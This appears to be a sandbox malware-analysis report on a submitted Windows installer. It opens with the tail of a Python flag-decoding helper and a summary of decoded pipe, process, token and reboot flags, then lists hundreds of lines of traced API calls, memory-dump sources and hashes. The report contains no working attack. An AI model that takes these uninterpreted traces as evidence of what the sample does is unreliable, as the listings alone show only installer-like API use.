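    for entry in decode_report(REPORT_LINES):
        print(f"{entry['func']}.{entry['module']} @ {entry['ref']:08X}", entry["decoded"])
```

Run against the six lines above it reports the pipe as PIPE_ACCESS_DUPLEX | FILE_FLAG_OVERLAPPED | FILE_FLAG_FIRST_PIPE_INSTANCE in PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE mode, the client side opened GENERIC_READ | GENERIC_WRITE with OPEN_EXISTING, the helper started with CREATE_NO_WINDOW | CREATE_DEFAULT_ERROR_MODE, the token opened for TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, and ExitWindowsEx called with EWX_REBOOT. Extending the tables to other functions is a matter of adding a (function, index) entry; the decoder never guesses at positions it does not know.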
APIs
• GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045B86D
• GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045B87D
• GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045B88D
• ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047A5DB,00000000,0047A604), ref: 0045B8B2
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: AddressProc$CryptVersion
• String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
• API String ID: 1951258720-508647305
• Opcode ID: c3c7ec0b1ce4a4f9ebe2d8e394cd6736047279cae241cd1696ff5e4f0e7e87a0
• Instruction ID: 302474af057a75e6aa59db1b8817eaeab706bde5883f342fd947c8368cb819cc
• Opcode Fuzzy Hash: c3c7ec0b1ce4a4f9ebe2d8e394cd6736047279cae241cd1696ff5e4f0e7e87a0
• Instruction Fuzzy Hash: BFF0F9B0529700DEEB06EF76AC866623699E79032AF14D43BE408961A2D77C0448CF1C
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,0049289E,?,?,00000000,00496628,?,00492A28,00000000,00492A7C,?,?,00000000,00496628), ref: 004927B7
                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049283A
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00492876,?,00000000,?,00000000,0049289E,?,?,00000000,00496628,?,00492A28,00000000), ref: 00492852
                                                                                      • FindClose.KERNEL32(000000FF,0049287D,00492876,?,00000000,?,00000000,0049289E,?,?,00000000,00496628,?,00492A28,00000000,00492A7C), ref: 00492870
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$AttributesCloseFirstNext
                                                                                      • String ID: isRS-$isRS-???.tmp
                                                                                      • API String ID: 134685335-3422211394
                                                                                      • Opcode ID: 70fea279a0487c66a379aa7ff36a45d08903b4abdbe9169b97591ec596f32377
                                                                                      • Instruction ID: 6f3af90e7e4d79464d1657adb4957f5333b5dfcd3ed3f620ee887a0d658b233a
                                                                                      • Opcode Fuzzy Hash: 70fea279a0487c66a379aa7ff36a45d08903b4abdbe9169b97591ec596f32377
                                                                                      • Instruction Fuzzy Hash: A5319471900618BFDF10EF66CD41ACEBBBCDB49304F5085F7A808A32A1D7789E458E58
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,00478B12,?,00000000,?,00000000,?,00478C56,00000000,00000000), ref: 004788AD
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004789BD,?,00000000,?,?,?,?,00000000,00478B12,?,00000000,?,00000000), ref: 00478999
                                                                                      • FindClose.KERNEL32(000000FF,004789C4,004789BD,?,00000000,?,?,?,?,00000000,00478B12,?,00000000,?,00000000), ref: 004789B7
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,00478B12,?,00000000,?,00000000,?,00478C56,00000000), ref: 00478A10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$First$CloseNext
                                                                                      • String ID:
                                                                                      • API String ID: 2001080981-0
                                                                                      • Opcode ID: bf4e0802f79d6ecb0b26fe8947a890451376e871c9cd550310497b4db5b6158c
                                                                                      • Instruction ID: c53e02efa538cd00ed8c6064e36d24adcac4933ff0a83cd0056e21b928a08691
                                                                                      • Opcode Fuzzy Hash: bf4e0802f79d6ecb0b26fe8947a890451376e871c9cd550310497b4db5b6158c
                                                                                      • Instruction Fuzzy Hash: CD71607090020DAFCF11EFA5CC45ADFBBB9EF49304F5084AAE508A7291DB399A45CF59
                                                                                      APIs
                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0045587D
                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004558A4
                                                                                      • SetForegroundWindow.USER32(?), ref: 004558B5
                                                                                      • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00455B8F,?,00000000,00455BCB), ref: 00455B7A
                                                                                      Strings
                                                                                      • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004559FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                      • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                      • API String ID: 2236967946-3182603685
                                                                                      • Opcode ID: aba927f1f309b32fe38766258577f601f314c8aed9c78afadeeb596dcf30424a
                                                                                      • Instruction ID: 78b58341f63533b3ae22fdc0b35f2ff7933112878ccc3eccec269f40d3d6be6d
                                                                                      • Opcode Fuzzy Hash: aba927f1f309b32fe38766258577f601f314c8aed9c78afadeeb596dcf30424a
                                                                                      • Instruction Fuzzy Hash: 0291C234604604EFD715CF65D965F6ABBF9EB48714F2180BAEC0497792C739AE04CB18
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,0045492C), ref: 00454828
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045482E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                      • API String ID: 1646373207-3712701948
                                                                                      • Opcode ID: eac562a1060f7fadf38ecb16a1882514189a9ad3f183d6e31b82e056aa49acf1
                                                                                      • Instruction ID: 4ed4d427c84f2e0797dfbcbbf1775a844099e9a297d380e2836bd8fb6971dfff
                                                                                      • Opcode Fuzzy Hash: eac562a1060f7fadf38ecb16a1882514189a9ad3f183d6e31b82e056aa49acf1
                                                                                      • Instruction Fuzzy Hash: DA316275A04249AFCF01EFA5C8829EFB7B8EF89704F504567E800F7252D6385D098B68
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 00417C7F
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Placement$Iconic
                                                                                      • String ID: ,
                                                                                      • API String ID: 568898626-3772416878
                                                                                      • Opcode ID: 81a48e547fa398d3f0e332d3c5732c978cb07eabcf612ef17b70e18ae1a1ab95
                                                                                      • Instruction ID: c7e48a005123f112bfb3c773aae920d88014dc0855fb7fe4f04d55f6c4297c8c
                                                                                      • Opcode Fuzzy Hash: 81a48e547fa398d3f0e332d3c5732c978cb07eabcf612ef17b70e18ae1a1ab95
                                                                                      • Instruction Fuzzy Hash: 92213E71604204ABCF00EF69D8C4ADA77B8AF48314F11456AFD18DF346D678E984CBA8
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00460751), ref: 004605C5
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00460724,?,00000001,00000000,00460751), ref: 00460654
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00460706,?,00000000,?,00000000,00460724,?,00000001,00000000,00460751), ref: 004606E6
                                                                                      • FindClose.KERNEL32(000000FF,0046070D,00460706,?,00000000,?,00000000,00460724,?,00000001,00000000,00460751), ref: 00460700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                      • String ID:
                                                                                      • API String ID: 4011626565-0
                                                                                      • Opcode ID: 8e5f21022fae35bd05caf680941799b374ea027a06ecb90817f05a91b3dc2be9
                                                                                      • Instruction ID: f78dcee57c625dac1728093300786459247b71741faca452f92d1a4d7efbbe15
                                                                                      • Opcode Fuzzy Hash: 8e5f21022fae35bd05caf680941799b374ea027a06ecb90817f05a91b3dc2be9
                                                                                      • Instruction Fuzzy Hash: D941B970A006189FDB11EF65DC85ADFB7B8EB88705F5044BAF804E7391D63C9E488E59
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00460BF7), ref: 00460A85
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00460BC2,?,00000001,00000000,00460BF7), ref: 00460ACB
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00460BA4,?,00000000,?,00000000,00460BC2,?,00000001,00000000,00460BF7), ref: 00460B80
                                                                                      • FindClose.KERNEL32(000000FF,00460BAB,00460BA4,?,00000000,?,00000000,00460BC2,?,00000001,00000000,00460BF7), ref: 00460B9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                      • String ID:
                                                                                      • API String ID: 4011626565-0
                                                                                      • Opcode ID: 49e9851897b8f681d322c96bb90846bd68f017f54ff683acd975a5c922cbe8b7
                                                                                      • Instruction ID: c4fca8719043302f1557867009f5b54629f0d04ae6016422a46977757255b98a
                                                                                      • Opcode Fuzzy Hash: 49e9851897b8f681d322c96bb90846bd68f017f54ff683acd975a5c922cbe8b7
                                                                                      • Instruction Fuzzy Hash: D7417631A00618DFCB10EFA5DC859DFB7B8EB88709F5085A6F804A7341E7789E448E59
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00451B47,00000000,00451B68), ref: 0042E6FE
                                                                                      • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E729
                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00451B47,00000000,00451B68), ref: 0042E736
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00451B47,00000000,00451B68), ref: 0042E73E
                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00451B47,00000000,00451B68), ref: 0042E744
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 1177325624-0
                                                                                      • Opcode ID: b398f5f594d3ce364fdf5cd670d1d6f1cfc7debce29cf4bfe02d4251d0372630
                                                                                      • Instruction ID: 405047736e0f3db58adf1e262a5124b738154ad7abc3b976f47152011cf6baa3
                                                                                      • Opcode Fuzzy Hash: b398f5f594d3ce364fdf5cd670d1d6f1cfc7debce29cf4bfe02d4251d0372630
                                                                                      • Instruction Fuzzy Hash: 12F0F0713917207AF620B1BA6CC6F7B018CC7C5B68F10823ABB04FF1C1D9A84C06056D
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 0047E0E6
                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 0047E104
                                                                                      • ShowWindow.USER32(00000000,00000005,00000000,000000F0,00497030,0047D932,0047D966,00000000,0047D986,?,?,00000001,00497030), ref: 0047E126
                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,000000F0,00497030,0047D932,0047D966,00000000,0047D986,?,?,00000001,00497030), ref: 0047E13A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$IconicLong
                                                                                      • String ID:
                                                                                      • API String ID: 2754861897-0
                                                                                      • Opcode ID: f6c937e62bd4f7f33b8cff1129e0ff9e0c9ea1576419266ffb873d417130a402
                                                                                      • Instruction ID: c92ae80fdea3dbb9ecd522712915d334841aed4b7b9fd6eda1dbd96f1c302fca
                                                                                      • Opcode Fuzzy Hash: f6c937e62bd4f7f33b8cff1129e0ff9e0c9ea1576419266ffb873d417130a402
                                                                                      • Instruction Fuzzy Hash: 910171702252509ADB00B776CC46BDB2396AB19344F4486BBF8489B3A3CA7D9C61974C
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,0045F0DC), ref: 0045F060
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0045F0BC,?,00000000,?,00000000,0045F0DC), ref: 0045F09C
                                                                                      • FindClose.KERNEL32(000000FF,0045F0C3,0045F0BC,?,00000000,?,00000000,0045F0DC), ref: 0045F0B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 28630f636b04da4fcdbc8bf603e3cd822730a77496e846d3c01d6dea91b4df37
                                                                                      • Instruction ID: 68591aebe15be66c02bfe18b1190825c6ab69d9b7e21385b208dddf45066949f
                                                                                      • Opcode Fuzzy Hash: 28630f636b04da4fcdbc8bf603e3cd822730a77496e846d3c01d6dea91b4df37
                                                                                      • Instruction Fuzzy Hash: 6D21DB315047086EDB11EB65CC41ADEBBACDB49714F5484F7BC08D35E3E6389E4C895A
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 00424154
                                                                                      • SetActiveWindow.USER32(?,?,?,00468BB4), ref: 00424161
                                                                                        • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                                        • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,023125AC,0042417A,?,?,?,00468BB4), ref: 00423ABF
                                                                                      • SetFocus.USER32(00000000,?,?,?,00468BB4), ref: 0042418E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ActiveFocusIconicShow
                                                                                      • String ID:
                                                                                      • API String ID: 649377781-0
                                                                                      • Opcode ID: bf39fc93c20dd362814a915e3816c2be519e9f0d9e4d58152530bfc1c9f789b4
                                                                                      • Instruction ID: 4136aac35a779e4733478972a6ab5bc4469f39141bd8f2cff661810d574da02b
                                                                                      • Opcode Fuzzy Hash: bf39fc93c20dd362814a915e3816c2be519e9f0d9e4d58152530bfc1c9f789b4
                                                                                      • Instruction Fuzzy Hash: 3EF03A717001208BDB40AFAA98C4B9633A8AF48304B55017BBD09EF34BCA7CDC5187A8
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 00417C7F
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Placement$Iconic
                                                                                      • String ID:
                                                                                      • API String ID: 568898626-0
                                                                                      • Opcode ID: b8fbe12c44fb062a6cac749eb6b5fd61645d1f9f5889301bfb76636b936bc9d1
                                                                                      • Instruction ID: f0313cfea0d4087130c3a657ee055cc65a4736f61d4b278e94d42609036002a6
                                                                                      • Opcode Fuzzy Hash: b8fbe12c44fb062a6cac749eb6b5fd61645d1f9f5889301bfb76636b936bc9d1
                                                                                      • Instruction Fuzzy Hash: 31015A31204104ABDF10EE6A98C5EEA73A8AF44324F114166FD08CF342E638EC8086A8
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CaptureIconic
                                                                                      • String ID:
                                                                                      • API String ID: 2277910766-0
                                                                                      • Opcode ID: af1c5b43412e2fcaa88ec6dbe6a8b705b794b180b560b7f19973f3177c796014
                                                                                      • Instruction ID: 516534a0d685a41b5289b303ed97122a4deaa6af678778b669afb1f0a2bf06d6
                                                                                      • Opcode Fuzzy Hash: af1c5b43412e2fcaa88ec6dbe6a8b705b794b180b560b7f19973f3177c796014
                                                                                      • Instruction Fuzzy Hash: 80F04471B04602A7DB20E72EC8C5AA762F69F44394B54443FF415C7B96EA7CDCC48758
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 0042410B
                                                                                        • Part of subcall function 004239F4: EnumWindows.USER32(0042398C), ref: 00423A18
                                                                                        • Part of subcall function 004239F4: GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                                        • Part of subcall function 004239F4: GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                                        • Part of subcall function 004239F4: SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                                      • SetActiveWindow.USER32(?,?,?,00423CE3,00000000,004240CC), ref: 0042411F
                                                                                        • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2671590913-0
                                                                                      • Opcode ID: 42e4936c4a6647b65b5ab24117e0ac4ae5d8008d356746b3415a205c164669c5
                                                                                      • Instruction ID: b8e4b42960b6b3797255afb6d30997fccd36cf0c86298b6f3b138aeb4614201e
                                                                                      • Opcode Fuzzy Hash: 42e4936c4a6647b65b5ab24117e0ac4ae5d8008d356746b3415a205c164669c5
                                                                                      • Instruction Fuzzy Hash: 76E0E5A0300100C7EB00AFAAD8C9B9672A9BB48304F5501BABC08CF24BD6B8C8948724
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00412745), ref: 00412733
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: ccb3f07b2fee23e1b7d0b9fe211690240d667b5ade3c407fcf90e85793529408
                                                                                      • Instruction ID: 7676943622bfa1b87a175b7a8473920ed7b4936c8d574fb73453cf2521b2b913
                                                                                      • Opcode Fuzzy Hash: ccb3f07b2fee23e1b7d0b9fe211690240d667b5ade3c407fcf90e85793529408
